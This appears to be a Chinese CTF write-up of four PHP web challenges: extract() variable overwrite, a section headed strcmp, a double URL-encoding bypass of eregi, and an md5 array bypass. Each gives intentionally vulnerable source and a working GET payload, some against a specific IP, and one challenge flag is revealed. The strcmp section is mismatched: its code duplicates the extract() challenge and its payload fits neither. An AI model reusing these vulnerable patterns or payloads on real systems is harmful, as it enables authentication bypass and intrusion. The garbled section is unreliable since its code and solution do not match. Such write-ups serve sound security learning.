#extract变量覆盖

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
$flag='xxx';
extract($_GET);
if(isset($shiyan))
{
$content=trim(file_get_contents($flag));
if($shiyan==$content)
{
echo'flag{xxx}';
}
else
{
echo'Oh.no';
}
}
?>

传输方式:get
要求:$shiyan==$content
题解:extract()函数, 将GET方式获得的变量导入到当前的符号表中
构造payload:http://120.24.86.145:9009/1.php?flag=&shiyan=

#strcmp比较字符串

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
$flag='xxx';
extract($_GET);
if(isset($shiyan))
{
$content=trim(file_get_contents($flag));
if($shiyan==$content)
{
echo'flag{bugku-dmsj-p2sm3N}';
}
else
{
echo'Oh.no';
}
}
?>

传输方式:get
要求:$shiyan==$content
题解:extract()函数, 将GET方式获得的变量导入到当前的符号表中
构造payload:
?a[]=1

#urldecode二次编码绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
if(eregi("hackerDJ",$_GET[id])) {
echo("

not allowed!

");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
echo "
Access granted!

";
echo "
flag

";
}
?>

eregi()功能:字符串比对解析,与大小写无关
$_GET[id] == "hackerDJ"
因为id的值经历一次解码
想要它最终结果与解码一次的hackerDJ相等
即它一开始的值等于hacjerDJ俩次URL加密的值
一次编码 %68ackerDJ
二次编码 %2568ackerDJ
构造payload:http://120.24.86.145:9009/10.php?id=%2568ackerDJ

#md5()函数

1
2
3
4
5
6
7
8
9
10
11
12
<?php
error_reporting(0);
$flag = 'flag{test}';
if (isset($_GET['username']) and isset($_GET['password'])) {
if ($_GET['username'] == $_GET['password'])
print 'Your password can not be your username.';
else if (md5($_GET['username']) === md5($_GET['password']))
die('Flag: '.$flag);
else
print 'Invalid password';
}
?>

username与password值不同
md5()加密后值===
构造payload:http://120.24.86.145:9009/18.php?username[]=1&password[]=2